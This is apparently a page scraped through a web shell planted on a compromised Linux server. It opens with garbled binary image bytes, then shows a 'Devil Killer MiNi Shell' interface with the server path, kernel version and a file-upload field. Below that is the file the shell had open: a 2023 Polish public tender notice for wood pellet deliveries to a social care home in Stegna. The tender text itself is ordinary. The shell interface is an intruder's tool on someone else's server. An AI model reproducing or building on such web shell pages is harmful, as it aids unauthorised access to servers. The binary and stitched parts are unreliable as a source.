JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230314/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230314/0013478001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> ZAKUP Z SUKCESYWNYMI DOSTAWAMI GRANULATU DRZEWNEGO <br/>(TYPU PELLET PELET, PELLETS) DO DOMU POMOCY SPOŁECZNEJ MORS W STEGNIE </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Dom Pomocy Społecznej &#34;MORS&#34;</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 170063030</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Morska 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stegna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-103</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">55 247 83 84</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dpsmors@dpsmors-stegna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.dpsmors-stegna.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> jednostka sektora finansów publicznych nieposiadająca osobowości prawnej </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZAKUP Z SUKCESYWNYMI DOSTAWAMI GRANULATU DRZEWNEGO <br/>(TYPU PELLET PELET, PELLETS) DO DOMU POMOCY SPOŁECZNEJ MORS W STEGNIE </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d2b85ea4-c24a-11ed-8261-62cbbe4d0ca4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00134780</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00025207/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zakup z sukcesywnymi dostawami granulatu drzewnego (typu pellet, pelet,pellets) do Domu Pomocy Społecznej &#34;MORS&#34; w Stegnie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d2b85ea4-c24a-11ed-8261-62cbbe4d0ca4 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">za pośrednictwem Platformy pod adresem https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-d2b85ea4-c24a-11ed-8261-62cbbe4d0ca4</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W celu prawidłowego korzystania z usług Platformy e-Zamówienia wymagany jest: Komputer PC:<br/>1)	parametry minimum: Intel Core2 Duo, 2 GB RAM, HDD, <br/>2)	zainstalowany jedne z poniższych systemów operacyjnych: <br/>a)	MS Windows 7 lub nowszy, <br/>b)	OSX/Mac OS 10.10, <br/>c)	Ubuntu 14.04,<br/>3)	zainstalowana jedna z poniższych przeglądarek: <br/>a)	Chrome 66.0 lub nowsza, <br/>b)	Firefox 59.0 lub nowszy, <br/>c)	Safari 11.1 lub nowsza, <br/>d)	Edge 14.0 i nowsze, <br/>albo tablet/telefon: <br/>1)	parametry minimum: 4 rdzenie procesora, 2GB RAM, Android 6.0 Marshmallow, iOS 10.3,<br/>2)	przeglądarka Chrome 61 lub nowa.<br/>Dla skorzystania z pełnej funkcjonalności może być konieczne włączenie w przeglądarce obsługi protokołu bezpiecznej transmisji danych SSL, obsługi Java Script, oraz cookies.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DGO 2-230/11/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup z sukcesywnymi dostawami granulatu drzewnego (typu pellet, pelet, pellets) do Domu Pomocy Społecznej MORS w Stegnie. <br/>Przewidywane terminy i ilości paliwa: <br/>1)	kwiecień 2023 r.	16 ton<br/>2)	czerwiec 2023 r.	14 ton<br/>3)	wrzesień 2023 r.	20 ton<br/>4)	październik 2023 r.	24 tony<br/>5)	listopad 2023 r.	24 tony<br/>6)	grudzień 2023 r.	24 tony<br/>7)	styczeń 2024 r.	24 tony<br/>8)	luty 2024 r.	24 tony<br/>9)	marzec 2024 r.	24 tony<br/>10)	kwiecień 2024 r.	24 tony<br/>Wymogi jakościowe odnoszące się do głównych elementów składających się na przedmiot zamówienia: <br/>1)	parametry zgodne z normą PN-EN ISO 17225-2:2021-10 (Część 2: Klasy peletów drzewnych), klasa A1 i programem certyfikującym DIN plus lub EN plus,<br/>2) Zamawiający dopuszcza rozwiązania równoważne, <br/>3)	za rozwiązania równoważne zamawiający uzna, jeśli pellet będzie posiadał wskazane niżej parametry: <br/>a)	średnica od 6 ± 1 do 8 ± 1 mm,<br/>b)	długość od 3,15 do 40 mm,<br/>c)	wilgotność całkowita ≤ 10 %,<br/>d)	zawartość popiołu ≤ 0,7 w-%d,<br/>e)	wytrzymałość mechaniczna ≥ 97,5 w-%ar,<br/>f)	wartość opałowa ≥ 16,5 MJ/kgar <br/>g)	gęstość nasypowa ≥ 600 kg/m3ar. <br/>Wykonawca zobowiązuje się do przyjęcia zwrotu i wymiany części lub całości dostawy i wymiany na własny koszt, która nie odpowiada parametrom określonym w SWZ oraz w umowie oraz zawiera zanieczyszczenia powodujące powstawanie szlaki,<br/>Wykonawca dostarczając towar równoważny winien wykazać, że skład danego produktu odpowiada produktowi równoważnemu zgodnie z wymaganiami wskazanymi w pkt. 3, <br/>w przypadku zastrzeżeń w zakresie wymaganych parametrów wyszczególnionych <br/>w normie jakościowej DIN plus lub EN plus, Zamawiający zleci wykonanie badań dostarczonego pelletu dotyczących spełniania wymaganych norm jakościowych. Jeżeli badania wykażą niespełnienie ww. norm jakościowych, kosztami przeprowadzonych badań Zamawiający obciąży Wykonawcę. Ponadto Wykonawca opróżni na własny koszt magazyn (silosy) z dostarczonego nieodpowiadającego wymaganiom pelletu <br/>i dostarczy nowy pellet posiadający normę jakościową DIN plus lub EN plus. <br/>Ustalenia organizacyjne związane z wykonaniem przedmiotu zamówienia: <br/>1)	ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy,<br/>2)	terminy i wielkości dostaw dostosowane będą do możliwości magazynowych Zamawiającego, zależnych od ilości spalanego paliwa (czynników atmosferycznych), jednakże zamówienie powinno być złożone nie później niż na 3 dni kalendarzowe przed jego planowanym terminem,<br/>3)	szczegółowe wielkości i terminy dostaw będą uzgadniane każdorazowo telefonicznie lub elektronicznie drogą e-mailową,<br/>4)	Zamawiający zastrzega sobie prawo do zmiany wielkości danej dostawy, ilości i terminów dostaw,<br/>5)	z uwagi na pojemności magazynowe Zamawiającego jednorazowa dostawa nie może być większa niż 24 tony paliwa,<br/>6)	ze względu na usytuowanie pomieszczeń magazynowych w przypadku dostaw samochodem-autocysterną, winien on dysponować przewodami ciśnieniowymi nie krótszymi niż 12 m.b.,<br/>7)	dostawa pelletu na podstawie zamówienia będzie realizowana przez Wykonawcę jedynie w dni robocze od poniedziałku do piątku w godz. 7.00 – 15.00,<br/>8)	wymagana jest należyta staranność przy realizacji zamówienia,<br/>9)	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia,<br/>10) dowodem przyjęcia dostawy pelletu będzie: <br/>a)	prawidłowo wystawiona i dostarczona do odbiorcy faktura VAT, <br/>b)	dokument WZ z wydrukiem ilości dostarczonego pelletu i podpisem przedstawiciela Zamawiającego,<br/>c)	oświadczenie Wykonawcy potwierdzające parametry jakościowe dostarczonej partii pelletu (wg wzoru – Załącznik nr 3 do umowy). <br/>Warunki dotyczące sposobu wykonania przedmiotu zamówienia: <br/>1)	Wykonawca zobowiązuje się do przyjęcia zwrotu i wymiany części lub całości dostawy i wymiany na własny koszt, która nie odpowiada parametrom określonym w umowie oraz zawiera inne zanieczyszczenia powodujące powstawanie szlaki,<br/>2)	Wykonawca dostarczając towar równoważny w stosunku do wymaganego przez Zamawiającego (bądź lepszy) winien wykazać, że skład danego produktu odpowiada produktowi równoważnemu zgodnie z wymaganiami wskazanymi w pkt. 4,<br/>3)	pellet dostarczany cyklicznie transportem przy użyciu samochodu z naczepą przystosowaną do transportu pelletu luzem z pneumatycznym rozładunkiem pelletu do zbiornika magazynowego, lub opakowań typu big bag wraz z rozładunkiem do magazynu (silosów).<br/>4)	Wykonawca zobowiązany będzie po zawarciu umowy, ale przed realizacją pierwszej dostawy do przedłożenia Zamawiającemu kopii niżej wymienionych dokumentów, w celu potwierdzenia, że oferowany pellet, odpowiada wymaganiom określonym przez Zamawiającego: <br/>a)	certyfikatu wydanego przez jednostkę oceniającą zgodność lub sprawozdania z badań przeprowadzonych przez tę jednostkę, jako środka dowodowego potwierdzającego zgodność z wymaganiami lub cechami określonymi w opisie przedmiotu zamówienia, kryteriach oceny ofert lub warunkach realizacji zamówienia, <br/>b)	sprawozdanie z badań przeprowadzone przez laboratorium akredytowane, którego zakres akredytacji obejmuje biopaliwa stałe potwierdzające, <br/>iż oferowany pellet posiada właściwości zgodnie z normą PN EN 17225-2:2021-10 (Część 2: Klasy peletów drzewnych), klasa A 1 i programem certyfikującym DIN plus lub EN plus lub inną normą potwierdzającą, iż przedmiot dostawy ma równoważne parametry. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09111400-4 - Paliwa drzewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Prawo opcji: dodatkowo zamawiający wprowadza prawo opcji dopuszczając możliwość zwiększenia ilości zakupionego paliwa do 20 % wskazanej powyżej podstawowej łącznej ilości <br/>(tj. o dodatkowe 44 tony), uzależniając to prawo od potrzeb Zamawiającego wynikających <br/>z warunków pogodowych. W przypadku zwiększenia ilości, o których mowa powyżej, cena zakupu nie może być wyższa niż cena wskazana w ofercie przez Wykonawcę i określona w umowie. Zamawiający przewiduje możliwość uruchomienia prawa opcji w dwóch następujących przypadkach: <br/>1) po wyczerpaniu ilości zamówienia podstawowego (tj. 218 ton) w okresie obowiązywania umowy podstawowej, lub <br/>2) w przypadku niewykorzystania ilości zamówienia podstawowego (tj. 218 ton) w okresie obowiązywania umowy podstawowej. <br/>W takiej sytuacji umowa obowiązywać będzie do momentu wyczerpania zakresu przedmiotu zamówienia z zastosowaniem prawa opcji (218 ton + 44 tony) przez Zamawiającego, ale nie dłużej niż 3 miesiące (w zależności, która z powyższych przesłanek ziści się w pierwszej kolejności). <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający zastosował cenę jako jedyne kryterium oceny ofert uzasadniając to podaniem w opisie przedmiotu zamówienia standardów jakościowych oraz norm technicznych dotyczących głównych elementów składających się na przedmiot zamówienia <br/>Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę. <br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w ustawie Pzp, oraz w SWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryterium wyboru. <br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny ofert, zamawiający spośród tych ofert wybiera ofertę <br/>z najniższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych. <br/>Wszystkie oferty niepodlegające odrzuceniu oceniane będą na podstawie następującego kryterium tj.: <br/>(C) Cena brutto – 100% = 100 pkt, <br/><br/>wg wzoru: C = (Cn / Cb) x 100,<br/><br/>gdzie: <br/>C – liczba punktów dla kryterium „Cena”, <br/>Cn – cena najniższa, <br/>Cb – cena oferty badanej, <br/>100 – wagowy współczynnik matematyczny.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: <br/>1)	nie podlegają wykluczeniu, <br/>2)	spełniają warunki udziału w postępowaniu określone przez Zamawiającego <br/>w ogłoszeniu o zamówieniu i niniejszej SWZ. <br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące: <br/>1)	zdolności do występowania w obrocie gospodarczym: Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów: Zamawiający nie wyznacza szczegółowego warunku w tym zakresie,<br/>3)	sytuacji ekonomicznej lub finansowej: Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, <br/>4)	warunek zdolności technicznej i zawodowej: warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał lub wykonuje (sukcesywnie) minimum 2 dostawy pelletu, o wartości każdej min. 100.000,00 zł brutto. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia ww. warunek udziału w postępowaniu musi spełniać co najmniej jeden z Wykonawców. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W celu wykazania braku podstaw do wykluczenia, o których mowa w art. 108 ust. 1, art. 109 ust. 1 pkt 4)ustawy Pzp oraz art. 7 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, wraz z ofertą należy złożyć: <br/>1)	wypełnione oświadczenie o braku podstaw do wykluczenia – wg wzoru <br/>na Załączniku nr 2 do SWZ, <br/>2)	w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie wg wzoru na załączniku nr 2 do SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają brak podstaw wykluczenia. <br/>W celu potwierdzenia spełniania warunków udziału w postępowaniu, wraz z ofertą należy złożyć: wypełnione oświadczenie o spełnianiu warunków udziału w postępowaniu – wg wzoru na Załączniku nr 3 do SWZ. <br/>Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia należy przekazać Zamawiającemu przy użyciu środków komunikacji elektronicznej dopuszczonych w SWZ, w zakresie i sposobie określonych w przepisach rozporządzenia wydanego na podstawie art. 70 ustawy Pzp. <br/>Podmiotowe środki dowodowe sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski. <br/>W zakresie nie uregulowanym SWZ, zastosowanie mają przepisy rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający zgodnie z art. 439 ustawy Prawo zamówień publicznych przewiduje możliwość wprowadzenia zmian umowy, której przedmiotem są dostawy, zawartej na okres dłuższy <br/>niż 6 miesięcy, w zakresie wprowadzania zmian wysokości wynagrodzenia należnego Wykonawcy w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia.<br/>Zamawiający dopuszcza zmianę wynagrodzenia Wykonawcy nie częściej jednak niż jeden raz na 6 miesięcy, rozumianej jako podwyższenie lub obniżenie wynagrodzenia a w przypadku, <br/>gdy wynagrodzenie określone jest cenami jednostkowymi, jako podwyższenie lub obniżenie ceny jednostkowej.<br/>Podwyższenie wynagrodzenie może zostać dokonane nie więcej niż o wskaźnik cen towarów <br/>i usług konsumpcyjnych ogłoszony przez Prezesa GUS (półrocze bieżące do półrocza poprzedniego).<br/>W przypadku ujemnego wskaźnika cen towarów i usług konsumpcyjnych za dany okres, obniżenie wynagrodzenia może zostać dokonane nie więcej niż o ten wskaźnik. <br/>Podwyższenie wynagrodzenia następuje po zaakceptowaniu przez Zamawiającego wniosku Wykonawcy, przedłożonego Zamawiającemu z uzasadnieniem i szczegółowym wyliczeniem zmiany.<br/>Obniżenie wynagrodzenia następuje po zaakceptowaniu przez Wykonawcę wniosku Zamawiającego, przedłożonego Wykonawcy z uzasadnieniem i szczegółowym wyliczeniem zmiany.<br/>Zmiana wynagrodzenia będzie dotyczyła wyłącznie części umowy pozostałej do zrealizowania <br/>i będzie obowiązywała od daty określonej w aneksie do umowy. <br/>W przypadku braku akceptacji proponowanej ceny, Zamawiający może rozwiązać umowę <br/>z zachowaniem 30 dniowego okresu wypowiedzenia, liczonym od ostatniego dnia miesiąca, w którym dokonano wypowiedzenia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> 